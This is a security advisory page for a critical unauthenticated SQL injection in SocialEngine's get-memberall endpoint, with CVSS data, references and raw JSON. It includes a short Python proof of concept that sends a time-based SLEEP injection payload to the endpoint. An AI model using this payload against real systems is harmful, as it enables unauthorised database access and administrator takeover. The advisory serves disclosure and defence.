Security Vulnerability Report
中文
CVE-2026-41460 CVSS 9.8 CRITICAL

CVE-2026-41460

Published: 2026-04-23 15:37:25
Last Modified: 2026-04-29 20:16:31
Source: [email protected]

Description

SocialEngine versions 7.8.0 and prior contain a SQL injection vulnerability in the /activity/index/get-memberall endpoint where user-supplied input passed via the text parameter is not sanitized before being incorporated into a SQL query. An unauthenticated remote attacker can exploit this vulnerability to read arbitrary data from the database, reset administrator account passwords, and gain unauthorized access to the Packages Manager in the Admin Panel, potentially enabling remote code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:socialengine:socialengine:*:*:*:*:*:*:*:* - VULNERABLE
SocialEngine <= 7.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(target_url): """ PoC for CVE-2026-41460 Checks for SQL Injection in the 'text' parameter. """ endpoint = "/activity/index/get-memberall" # Payload attempting to cause a time-based delay or error payload = "1' AND SLEEP(5)-- -" params = { "text": payload } try: response = requests.get(target_url + endpoint, params=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: Time-based SQL Injection detected.") else: print("[-] Vulnerability not confirmed or patched.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with actual target check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41460", "sourceIdentifier": "[email protected]", "published": "2026-04-23T15:37:24.540", "lastModified": "2026-04-29T20:16:30.790", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SocialEngine versions 7.8.0 and prior contain a SQL injection vulnerability in the /activity/index/get-memberall endpoint where user-supplied input passed via the text parameter is not sanitized before being incorporated into a SQL query. An unauthenticated remote attacker can exploit this vulnerability to read arbitrary data from the database, reset administrator account passwords, and gain unauthorized access to the Packages Manager in the Admin Panel, potentially enabling remote code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:socialengine:socialengine:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.8.0", "matchCriteriaId": "6DA45DC7-D181-4DD5-929A-8EC5639C539B"}]}]}], "references": [{"url": "https://karmainsecurity.com/KIS-2026-08", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://socialengine.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/socialengine-sql-injection-via-activity-index-get-memberall", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/12", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://karmainsecurity.com/KIS-2026-08", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://karmainsecurity.com/pocs/CVE-2026-41460.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.